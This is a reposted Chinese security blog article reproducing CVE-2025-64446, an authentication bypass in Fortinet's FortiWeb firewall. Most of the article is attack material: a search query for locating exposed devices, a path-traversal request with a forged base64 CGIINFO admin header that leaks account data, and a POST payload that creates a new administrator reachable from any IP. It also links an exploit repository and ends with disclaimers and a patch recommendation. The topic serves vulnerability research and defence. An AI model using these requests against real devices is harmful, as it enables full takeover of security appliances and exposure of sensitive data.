文章总结: FortiWeb防火墙存在CVE-2025-64446敏感信息泄露和身份认证绕过漏洞,攻击者可利用fwbcgi组件信任HTTP_CGIINFO用户信息的缺陷,通过构造特定请求添加管理员账户获取设备完全控制权。文章提供了两个POC演示漏洞利用过程,并建议用户尽快升级至安全版本修复漏洞。
综合评分: 87
文章分类: 漏洞分析,漏洞预警,WEB安全,渗透测试
漏洞复现——CVE-2025-64446 FortiWeb敏感信息泄露和登陆绕过漏洞!(附POC)
原创
SaltyApp1e
咸苹果学安全
2025年11月21日 11:20
江苏
免责声明
本文的网络安全知识与漏洞复现内容仅用于教育目的,严禁用于非法活动。漏洞复现须在法律授权和授权环境下进行实践。本文作者及本公众号不对任何误用或由此引发的直接或间接后果承担责任。
今天不更实战,来分享一个牛波的新漏洞CVE-2025-64446
漏洞简介
FortiWeb是Fortinet 公司推出的专门用于保护 Web 应用程序的防火墙,其主要功能为防御针对网站、API 和移动应用后端的各种网络攻击,例如TOP 10、暴力破解、爬虫等。
其在特定版本存在敏感信息泄露和身份认证绕过漏洞,由于其fwbcgi组件完全信任请求中HTTP_CGIINFO的用户信息,而未能进行有效的身份验证,攻击者通过构造特定的请求,可以任意地添加管理员账户,从而获得设备的完全控制权。
在此漏洞基础上,还可以与CVE-2025-58034进行组合拳,可以导致RCE,感兴趣的师傅可以自行了解一下。
测绘语法
hunter:web.body=”FortiWeb” && web.body=”app.min.js”
hunter的资产比较少,fofa上会多一点
漏洞复现
POC1:
GET /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1Host:CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==
返回了大量的用户敏感信息
POC2:
修改请求体中的name和password参数,即可添加指定的管理员用户
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1Host:CGIINFO: eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{ "data": { "q_type": 1, "name": "{添加的管理员用户名}", "access-profile": "prof_admin", "access-profile_val": "0", "trusthostv4": "0.0.0.0/0", "trusthostv6": "::/0", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "comments": "", "sz_dashboard": -1, "type": "local-user", "type_val": "0", "admin-usergrp_val": "0", "wildcard_val": "0", "accprofile-override_val": "0", "sshkey": "", "passwd-set-time": 0, "history-password-pos": 0, "history-password0": "", "history-password1": "", "history-password2": "", "history-password3": "", "history-password4": "", "history-password5": "", "history-password6": "", "history-password7": "", "history-password8": "", "history-password9": "", "force-password-change": "disable", "force-password-change_val": "0", "password": "{添加的管理员密码}" }}
漏洞检测脚本
https://github.com/soltanali0/CVE-2025-64446-Exploit
修复建议
#
厂商已经发布漏洞补丁,尽快升级至安全版本
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:咸苹果学安全 SaltyApp1e《漏洞复现——CVE-2025-64446 FortiWeb敏感信息泄露和登陆绕过漏洞!(附POC)》